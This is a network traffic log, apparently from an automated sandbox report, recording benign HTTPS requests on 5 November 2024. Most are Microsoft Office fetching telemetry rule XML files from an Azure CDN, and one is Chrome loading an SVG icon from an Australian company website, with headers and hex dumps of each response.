                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:18 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    57192.168.2.44982413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 423
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                                    x-ms-request-id: 11f32c1c-b01e-003d-4c5c-2ed32c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080318Z-158dbd74bf4cvrq6hC1SN1zhyc00000003hg000000004wcq
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:18 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    58192.168.2.44982313.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 472
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                                    x-ms-request-id: 3e6f6a75-201e-0000-395c-2ea537000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080318Z-157b9fd754fbhrh6hC1SN1yhsw00000002fg000000001vsh
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:18 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    59192.168.2.44982213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 427
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                                    x-ms-request-id: 34624292-801e-0047-3c58-2e7265000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080318Z-158dbd74bf4cgkpvhC1SN11r4000000003ng000000002bn3
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:18 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    60192.168.2.44982013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:18 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:18 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 420
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                    x-ms-request-id: 891841ce-c01e-0014-6d8e-2da6a3000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080318Z-157b9fd754ff4xnphC1SN1wuxg000000046g000000003vcv
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:18 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    61192.168.2.449827162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:19 UTC691OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:19 UTC585INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:19 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"304-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 650
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210159-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730793149.835042,VS0,VS0,VE682
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb539d9999476c-DFW
                                                                                                                                    2024-11-05 08:03:19 UTC779INData Raw: 33 30 34 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 31 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 39 2e 30 30 30 37 20 31 39 2e 39 39 39 38 4c 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 4d 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 43 31 32 2e 37 30 39 34 20 31 32 2e 34 39 34 32 20 31 33 2e 31 39 36 39 20 31 31 2e 37 37 37 33 20 31 33 2e 35 33 30 39 20 31 30 2e 39 38 36 33 43 31 33 2e 38 36 34 39 20 31 30 2e 31 39 35 33 20 31 34 2e 30 33 39 20 39 2e 33 34 36 20 31 34 2e 30 34 32 39 20 38 2e 34 38 37 33 39 43 31 34 2e
                                                                                                                                    Data Ascii: 304<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.
                                                                                                                                    2024-11-05 08:03:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    62192.168.2.44982813.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:19 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:19 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 478
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                                    x-ms-request-id: 2173f510-c01e-000b-3b58-2ee255000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080319Z-157b9fd754fnxhv5hC1SN14xvn000000042g000000005k2p
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:19 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    63192.168.2.44983013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:19 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:19 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 479
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                                    x-ms-request-id: 66dddae9-001e-00ad-7c4d-2e554b000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080319Z-158dbd74bf4gbnjwhC1SN1gt5000000003tg0000000000me
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    64192.168.2.44983113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:19 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:19 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 404
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                                    x-ms-request-id: 44e37c5b-101e-007a-028e-2d047e000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080319Z-158dbd74bf4dtwdphC1SN1ubaw00000003ag000000002upn
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    65192.168.2.44983213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:19 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:19 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 468
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                                    x-ms-request-id: 7b0becc1-c01e-008d-6e3f-2e2eec000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080319Z-157b9fd754f8vn5phC1SN10bks000000046g0000000024g1
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    66192.168.2.44982913.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:19 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:19 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 400
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
